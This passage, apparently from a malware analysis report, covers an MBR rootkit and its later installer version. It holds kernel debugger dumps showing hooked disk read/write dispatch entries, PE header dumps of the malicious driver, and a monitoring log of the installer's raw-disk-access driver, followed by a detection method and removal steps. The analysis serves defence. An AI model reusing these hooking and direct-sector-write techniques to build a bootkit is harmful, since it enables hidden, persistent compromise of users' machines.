       +0x002 Size             : 0x518
       +0x004 ReferenceCount   : 0
       +0x008 DriverObject     : 0x81b92510 
          +0x000 Type             : 4
          +0x002 Size             : 168
          +0x004 DeviceObject     : 0x81be0310 
             +0x000 Type             : 3
             +0x002 Size             : 0x368
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : 0x81be1ab8 
             +0x010 AttachedDevice   : (null) 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0xd0
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81be0288 
             +0x028 DeviceExtension  : 0x81be03c8 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 5 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0x200
             +0x0ae Spare1           : 0
             +0x0b0 DeviceObjectExtension : 0x81be0678 
             +0x0b4 Reserved         : (null) 
          +0x008 Flags            : 0x12
          +0x00c DriverStart      : 0xf9a7c000 
          +0x010 DriverSize       : 0x8e00
          +0x014 DriverSection    : 0x81bf1ca0 
          +0x018 DriverExtension  : 0x81b925b8 
             +0x000 DriverObject     : 0x81b92510 
             +0x004 AddDevice        : 0xf9a94ec0           CLASSPNP!ClassAddDevice+0
             +0x008 Count            : 1
             +0x00c ServiceKeyName   : _UNICODE_STRING "Disk"
             +0x014 ClientDriverExtension : 0x81b92388 
             +0x018 FsFilterCallbacks : (null) 
          +0x01c DriverName       : _UNICODE_STRING "\Driver\Disk"
             +0x000 Length           : 0x18
             +0x002 MaximumLength    : 0x18
             +0x004 Buffer           : 0xe1403358  "\Driver\Disk"
          +0x024 HardwareDatabase : 0x8068de90  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
             +0x000 Length           : 0x5a
             +0x002 MaximumLength    : 0x5c
             +0x004 Buffer           : 0x805ceb98  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
          +0x028 FastIoDispatch   : (null) 
          +0x02c DriverInit       : 0xf9a838ab        disk!GsDriverEntry+0
          +0x030 DriverStartIo    : (null) 
          +0x034 DriverUnload     : 0xf9a9353a        CLASSPNP!ClassUnload+0
          +0x038 MajorFunction    : [28] 0xf9a92c30        CLASSPNP!ClassCreateClose+0
       +0x00c NextDevice       : (null) 
       +0x010 AttachedDevice   : 0x81be0020 
          +0x000 Type             : 3
          +0x002 Size             : 0x1c8
          +0x004 ReferenceCount   : 0
          +0x008 DriverObject     : 0x81bd4748 
             +0x000 Type             : 4
             +0x002 Size             : 168
             +0x004 DeviceObject     : 0x81be0020 
             +0x008 Flags            : 0x12
             +0x00c DriverStart      : 0xf9cd4000 
             +0x010 DriverSize       : 0x4900
             +0x014 DriverSection    : 0x81bf1de0 
             +0x018 DriverExtension  : 0x81bd47f0 
             +0x01c DriverName       : _UNICODE_STRING "\Driver\PartMgr"
             +0x024 HardwareDatabase : 0x8068de90  "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
             +0x028 FastIoDispatch   : (null) 
             +0x02c DriverInit       : 0xf9cd7880           PartMgr!DriverEntry+0
             +0x030 DriverStartIo    : (null) 
             +0x034 DriverUnload     : 0xf9cd49a1           PartMgr!PmUnload+0
             +0x038 MajorFunction    : [28] 0xf9cd44af           PartMgr!PmPassThrough+0
          +0x00c NextDevice       : (null) 
          +0x010 AttachedDevice   : (null) 
          +0x014 CurrentIrp       : (null) 
          +0x018 Timer            : (null) 
          +0x01c Flags            : 0x10
          +0x020 Characteristics  : 0x100
          +0x024 Vpb              : 0x81bebca0 
             +0x000 Type             : 10
             +0x002 Size             : 88
             +0x004 Flags            : 0
             +0x006 VolumeLabelLength : 0
             +0x008 DeviceObject     : (null) 
             +0x00c RealDevice       : 0x81be0020 
             +0x010 SerialNumber     : 0
             +0x014 ReferenceCount   : 0
             +0x018 VolumeLabel      : [32] 0
          +0x028 DeviceExtension  : 0x81be00d8 
          +0x02c DeviceType       : 7
          +0x030 StackSize        : 4 ''
          +0x034 Queue            : __unnamed
             +0x000 ListEntry        : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Wcb              : _WAIT_CONTEXT_BLOCK
          +0x05c AlignmentRequirement : 1
          +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x000 Type             : 20
             +0x002 Size             : 20
             +0x004 DeviceListHead   : _LIST_ENTRY [ 0x81be0084 - 0x81be0084 ]
             +0x00c Lock             : 0
             +0x010 Busy             : 0 ''
          +0x074 Dpc              : _KDPC
             +0x000 Type             : 0
             +0x002 Number           : 0 ''
             +0x003 Importance       : 0 ''
             +0x004 DpcListEntry     : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x00c DeferredRoutine  : (null) 
             +0x010 DeferredContext  : (null) 
             +0x014 SystemArgument1  : (null) 
             +0x018 SystemArgument2  : (null) 
             +0x01c Lock             : (null) 
          +0x094 ActiveThreadCount : 0
          +0x098 SecurityDescriptor : (null) 
          +0x09c DeviceLock       : _KEVENT
             +0x000 Header           : _DISPATCHER_HEADER
          +0x0ac SectorSize       : 0
          +0x0ae Spare1           : 0
          +0x0b0 DeviceObjectExtension : 0x81be01e8 
             +0x000 Type             : 13
             +0x002 Size             : 0
             +0x004 DeviceObject     : 0x81be0020 
             +0x008 PowerFlags       : 0
             +0x00c Dope             : 0x81b81d60 
             +0x010 ExtensionFlags   : 0
             +0x014 DeviceNode       : (null) 
             +0x018 AttachedTo       : 0x81be1ab8 
             +0x01c StartIoCount     : 0
             +0x020 StartIoKey       : 0
             +0x024 StartIoFlags     : 0
             +0x028 Vpb              : (null) 
          +0x0b4 Reserved         : (null) 
       +0x014 CurrentIrp       : (null) 
       +0x018 Timer            : (null) 
       +0x01c Flags            : 0x50
       +0x020 Characteristics  : 0x100
       +0x024 Vpb              : 0x81bebd00 
          +0x000 Type             : 10
          +0x002 Size             : 88
          +0x004 Flags            : 0x10
          +0x006 VolumeLabelLength : 0
          +0x008 DeviceObject     : (null) 
          +0x00c RealDevice       : 0x81be1ab8 
             +0x000 Type             : 3
             +0x002 Size             : 0x518
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : (null) 
             +0x010 AttachedDevice   : 0x81be0020 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81bebd00 
             +0x028 DeviceExtension  : 0x81be1b70 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 3 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be1fd0 
             +0x0b4 Reserved         : (null) 
          +0x010 SerialNumber     : 0xffffffff
          +0x014 ReferenceCount   : 0
          +0x018 VolumeLabel      : [32] 0
       +0x028 DeviceExtension  : 0x81be1b70 
       +0x02c DeviceType       : 7
       +0x030 StackSize        : 3 ''
       +0x034 Queue            : __unnamed
          +0x000 ListEntry        : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Flink            : (null) 
             +0x004 Blink            : (null) 
          +0x000 Wcb              : _WAIT_CONTEXT_BLOCK
             +0x000 WaitQueueEntry   : _KDEVICE_QUEUE_ENTRY
             +0x010 DeviceRoutine    : (null) 
             +0x014 DeviceContext    : (null) 
             +0x018 NumberOfMapRegisters : 0
             +0x01c DeviceObject     : (null) 
             +0x020 CurrentIrp       : (null) 
             +0x024 BufferChainingDpc : (null) 
       +0x05c AlignmentRequirement : 1
       +0x060 DeviceQueue      : _KDEVICE_QUEUE
          +0x000 Type             : 20
          +0x002 Size             : 20
          +0x004 DeviceListHead   : _LIST_ENTRY [ 0x81be1b1c - 0x81be1b1c ]
             +0x000 Flink            : 0x81be1b1c  [ 0x81be1b1c - 0x81be1b1c ]
             +0x004 Blink            : 0x81be1b1c  [ 0x81be1b1c - 0x81be1b1c ]
          +0x00c Lock             : 0
          +0x010 Busy             : 0 ''
       +0x074 Dpc              : _KDPC
          +0x000 Type             : 0
          +0x002 Number           : 0 ''
          +0x003 Importance       : 0 ''
          +0x004 DpcListEntry     : _LIST_ENTRY [ 0x0 - 0x0 ]
             +0x000 Flink            : (null) 
             +0x004 Blink            : (null) 
          +0x00c DeferredRoutine  : (null) 
          +0x010 DeferredContext  : (null) 
          +0x014 SystemArgument1  : (null) 
          +0x018 SystemArgument2  : (null) 
          +0x01c Lock             : (null) 
       +0x094 ActiveThreadCount : 0
       +0x098 SecurityDescriptor : 0xe13c9d90 
       +0x09c DeviceLock       : _KEVENT
          +0x000 Header           : _DISPATCHER_HEADER
             +0x000 Type             : 0x1 ''
             +0x001 Absolute         : 0 ''
             +0x002 Size             : 0x4 ''
             +0x003 Inserted         : 0 ''
             +0x004 SignalState      : 1
             +0x008 WaitListHead     : _LIST_ENTRY [ 0x81be1b5c - 0x81be1b5c ]
       +0x0ac SectorSize       : 0
       +0x0ae Spare1           : 1
       +0x0b0 DeviceObjectExtension : 0x81be1fd0 
          +0x000 Type             : 13
          +0x002 Size             : 0
          +0x004 DeviceObject     : 0x81be1ab8 
             +0x000 Type             : 3
             +0x002 Size             : 0x518
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81b92510 
             +0x00c NextDevice       : (null) 
             +0x010 AttachedDevice   : 0x81be0020 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x100
             +0x024 Vpb              : 0x81bebd00 
             +0x028 DeviceExtension  : 0x81be1b70 
             +0x02c DeviceType       : 7
             +0x030 StackSize        : 3 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be1fd0 
             +0x0b4 Reserved         : (null) 
          +0x008 PowerFlags       : 0
          +0x00c Dope             : 0x81b81e68 
          +0x010 ExtensionFlags   : 0
          +0x014 DeviceNode       : (null) 
          +0x018 AttachedTo       : 0x81be2f18 
             +0x000 Type             : 3
             +0x002 Size             : 0xb8
             +0x004 ReferenceCount   : 0
             +0x008 DriverObject     : 0x81bebbd0 
             +0x00c NextDevice       : 0x81b93030 
             +0x010 AttachedDevice   : 0x81be1ab8 
             +0x014 CurrentIrp       : (null) 
             +0x018 Timer            : (null) 
             +0x01c Flags            : 0x50
             +0x020 Characteristics  : 0x180
             +0x024 Vpb              : (null) 
             +0x028 DeviceExtension  : 0x81ba0e50 
             +0x02c DeviceType       : 0x32
             +0x030 StackSize        : 2 ''
             +0x034 Queue            : __unnamed
             +0x05c AlignmentRequirement : 1
             +0x060 DeviceQueue      : _KDEVICE_QUEUE
             +0x074 Dpc              : _KDPC
             +0x094 ActiveThreadCount : 0
             +0x098 SecurityDescriptor : 0xe13c9d90 
             +0x09c DeviceLock       : _KEVENT
             +0x0ac SectorSize       : 0
             +0x0ae Spare1           : 1
             +0x0b0 DeviceObjectExtension : 0x81be2fd0 
             +0x0b4 Reserved         : (null) 
          +0x01c StartIoCount     : 0
          +0x020 StartIoKey       : 0
          +0x024 StartIoFlags     : 0
          +0x028 Vpb              : (null) 
       +0x0b4 Reserved         : (null) 
    
    DriverObject -> MajorFunction    
    
    81b92548 f9a92c30 CLASSPNP!ClassCreateClose
    81b9254c 805025e4 nt!IopInvalidDeviceRequest
    81b92550 f9a92c30 CLASSPNP!ClassCreateClose
    81b92554 81831410                             <--- IRP_MJ_READ hook 
    81b92558 81831410                             <--- IRP_MJ_WRITE hook
    81b9255c 805025e4 nt!IopInvalidDeviceRequest
    81b92560 805025e4 nt!IopInvalidDeviceRequest
    81b92564 805025e4 nt!IopInvalidDeviceRequest
    81b92568 805025e4 nt!IopInvalidDeviceRequest
    81b9256c f9a8d366 CLASSPNP!ClassShutdownFlush
    81b92570 805025e4 nt!IopInvalidDeviceRequest
    81b92574 805025e4 nt!IopInvalidDeviceRequest
    81b92578 805025e4 nt!IopInvalidDeviceRequest
    81b9257c 805025e4 nt!IopInvalidDeviceRequest
    81b92580 f9a8d44d CLASSPNP!ClassDeviceControlDispatch
    81b92584 f9a90fc3 CLASSPNP!ClassInternalIoControl
    81b92588 f9a8d366 CLASSPNP!ClassShutdownFlush
    81b9258c 805025e4 nt!IopInvalidDeviceRequest
    81b92590 805025e4 nt!IopInvalidDeviceRequest
    81b92594 805025e4 nt!IopInvalidDeviceRequest
    81b92598 805025e4 nt!IopInvalidDeviceRequest
    81b9259c 805025e4 nt!IopInvalidDeviceRequest
    81b925a0 f9a8eef3 CLASSPNP!ClassDispatchPower
    81b925a4 f9a93a24 CLASSPNP!ClassSystemControl
    81b925a8 805025e4 nt!IopInvalidDeviceRequest
    81b925ac 805025e4 nt!IopInvalidDeviceRequest
    81b925b0 805025e4 nt!IopInvalidDeviceRequest
    81b925b4 f9a92d15 CLASSPNP!ClassDispatchPnp
    81b925b8 81b92510 
    81b925bc f9a94ec0 CLASSPNP!ClassAddDevice
    

    Kernel driver


    The malicious kernel driver is loaded at the last stage of boot process. The driver as the main part of this rootkit is responsible for the network communication and hiding real content of affected sectors.

    Microsoft (R) COFF Binary File Dumper Version 6.00.8447
    Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
    
    
    Dump of file mbr.sys
    
    PE signature found
    
    File Type: EXECUTABLE IMAGE
    
    FILE HEADER VALUES
                 14C machine (i386)
                   5 number of sections
            47578F69 time date stamp Thu Dec 06 06:58:01 2007
                   0 file pointer to symbol table
                   0 number of symbols
                  E0 size of optional header
                 10E characteristics
                       Executable
                       Line numbers stripped
                       Symbols stripped
                       32 bit word machine
    
    OPTIONAL HEADER VALUES
                 10B magic #
                7.10 linker version
                9900 size of code
               2F078 size of initialized data
                   0 size of uninitialized data
                9946 RVA of entry point
                 480 base of code
                9A80 base of data
               10000 image base
                  80 section alignment
                  80 file alignment
                5.00 operating system version
                5.00 image version
                5.00 subsystem version
                   0 Win32 version
               3BBF8 size of image
                 480 size of headers
               47EF6 checksum
                   1 subsystem (Native)
                   0 DLL characteristics
               40000 size of stack reserve
                1000 size of stack commit
              100000 size of heap reserve
                1000 size of heap commit
                   0 loader flags
                  10 number of directories
                   0 [       0] RVA [size] of Export Directory
                9C9C [      28] RVA [size] of Import Directory
                   0 [       0] RVA [size] of Resource Directory
                   0 [       0] RVA [size] of Exception Directory
                   0 [       0] RVA [size] of Certificates Directory
                9E80 [    2DFC] RVA [size] of Base Relocation Directory
                   0 [       0] RVA [size] of Debug Directory
                   0 [       0] RVA [size] of Architecture Directory
                   0 [       0] RVA [size] of Special Directory
                   0 [       0] RVA [size] of Thread Storage Directory
                   0 [       0] RVA [size] of Load Configuration Directory
                   0 [       0] RVA [size] of Bound Import Directory
                9A80 [      44] RVA [size] of Import Address Table Directory
                   0 [       0] RVA [size] of Delay Import Directory
                   0 [       0] RVA [size] of Reserved Directory
                   0 [       0] RVA [size] of Reserved Directory
    
    
    SECTION HEADER #1
       .text name
        95BC virtual size
         480 virtual address
        9600 size of raw data
         480 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000020 flags
             Code
             Not Paged
             Execute Read Write
    
    SECTION HEADER #2
      .rdata name
          A8 virtual size
        9A80 virtual address
         100 size of raw data
        9A80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
    SECTION HEADER #3
        INIT name
         2F6 virtual size
        9B80 virtual address
         300 size of raw data
        9B80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000020 flags
             Code
             Not Paged
             Execute Read Write
    
    SECTION HEADER #4
      .reloc name
        2E26 virtual size
        9E80 virtual address
        2E80 size of raw data
        9E80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
    SECTION HEADER #5
     .attach name
       2EEF8 virtual size
        CD00 virtual address
       2EEF8 size of raw data
        CD00 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
      Summary
    
           2EF00 .attach
             100 .rdata
            2E80 .reloc
            9600 .text
             300 INIT
    

    Detection


    The detection method could be based on cross-view comparison of MBR sector. The userland part can use Windows API functions to read a fake content of MBR:

    hFile = CreateFile( "\\\\.\\PHYSICALDRIVE0", GENERIC_READ, ...
    ReadFile( hFile, Buffer, 512, ...
    

    and the kernel part of the scanner could read MBR by using original pointer of \Driver\Disk -> MajorFunction[IRP_MJ_READ] = CLASSPNP!ClassReadWrite.

    If the content of sectors is not identical, the machine has been infected.


    Rootkit removal


    To remove rootkit from infected machine you can simply use "Recovery Console" command: fixmbr.

    References

    [1] Derek Soeder Ryan Permeh, eEye BootRoot, 2005 http://research.eeye.com/html/tools/RT20060801-7.html

    [2] Symantec AntiVirus Research Center, Understanding Virus Behavior under Windows NT http://www.symantec.com/avcenter/reference/virus.behavior.under.win.nt.pdf

    [3] Joanna Rutkowska, Pagefile attack, 2006 http://theinvisiblethings.blogspot.com/2006_10_01_archive.html

    [4] Mark Russinovich Bryce Cogswell, Process Monitor http://www.microsoft.com/technet/sysinternals/processesandthreads/processmonitor.mspx

    [5] Nitin Kumar Vipin Kumar, Vbootkit: Compromising Windows Vista Security, 2007 http://www.blackhat.com/presentations/bh-europe-07/Kumar/Presentation/bh-eu-07-kumar-apr19.pdf




    Update - mat25.exe

    Feb 10th, 2008

    After a month, the author of the rootkit, released improved version of the malware. The main part of rootkit is almost identical to the previous one, and the changes concerning the installer.

    
    Dump of file mbr2.sys
    
    PE signature found
    
    File Type: EXECUTABLE IMAGE
    
    FILE HEADER VALUES
                 14C machine (i386)
                   5 number of sections
            47AA1720 time date stamp Wed Feb 06 21:22:56 2008
                   0 file pointer to symbol table
                   0 number of symbols
                  E0 size of optional header
                 10E characteristics
                       Executable
                       Line numbers stripped
                       Symbols stripped
                       32 bit word machine
    
    OPTIONAL HEADER VALUES
                 10B magic #
                7.10 linker version
                6C00 size of code
               2FB60 size of initialized data
                   0 size of uninitialized data
                6C18 RVA of entry point
                 480 base of code
                6D80 base of data
               10000 image base
                  80 section alignment
                  80 file alignment
                5.00 operating system version
                5.00 image version
                5.00 subsystem version
                   0 Win32 version
               38AE0 size of image
                 480 size of headers
               408B1 checksum
                   1 subsystem (Native)
                   0 DLL characteristics
               40000 size of stack reserve
                1000 size of stack commit
              100000 size of heap reserve
                1000 size of heap commit
                   0 loader flags
                  10 number of directories
    

    Improved installer


    The previous version of the installer was modifying disk sectror via the standard Windows API functions. This method of infection of the MBR could be easly intercept by security applications, so the latest version uses special driver developed for the direct disk sectors access.

    2008-02-10 14:09:21 gmer.sys cmd.exe [372]: CreateProcessEx c:\rootkits\mat25.exe
    2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\docume~1\przemek\ustawi~1\temp\1.tmp
    2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\rootkits\mat25.exe
    2008-02-10 14:10:07 gmer.sys services.exe [552]: CreateProcessEx c:\windows\system32\svchost.exe
    2008-02-10 14:10:16 gmer.sys svchost.exe [1252]: CreateProcessEx c:\windows\temp\3.tmp
    2008-02-10 14:11:21 gmer.sys services.exe [552]: LoadDriver \??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}
    
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{FBE1D620-5418-4aae-A0F0-316D590663A1}]
    "Type"=dword:00000001
    "Start"=dword:00000003
    "ErrorControl"=dword:00000000
    "ImagePath"="\??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}"
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BFB System: nt!KeInitializeSpinLock
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C8C System: nt!ObReferenceObjectByHandle( (HANDLE)0x17C [\Device\Harddisk0] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C99 System: nt!ZwClose( (HANDLE)0x17C [\Device\Harddisk0] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D26 System: nt!ObfDereferenceObject( (OBJECT)0x81A53248 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D38 System: nt!ExAllocatePoolWithTag( (SIZE_T)24 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D5F System: nt!ExfInterlockedInsertTailList
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk1" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk1" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk2" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk2" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk3" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk3" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk4" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk4" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk5" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk5" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk6" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk6" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk7" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk7" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk8" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk8" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk9" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk9" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk10" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk10" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk11" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk11" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk12" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk12" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk13" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk13" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk14" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk14" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk15" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk15" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2DE6 System: nt!RtlInitUnicodeString( "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E05 System: nt!IoCreateDevice( "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E4D System: nt!RtlInitUnicodeString( "\DosDevices\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E5D System: nt!IoCreateSymbolicLink( "\DosDevices\RealHardDisk0", "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
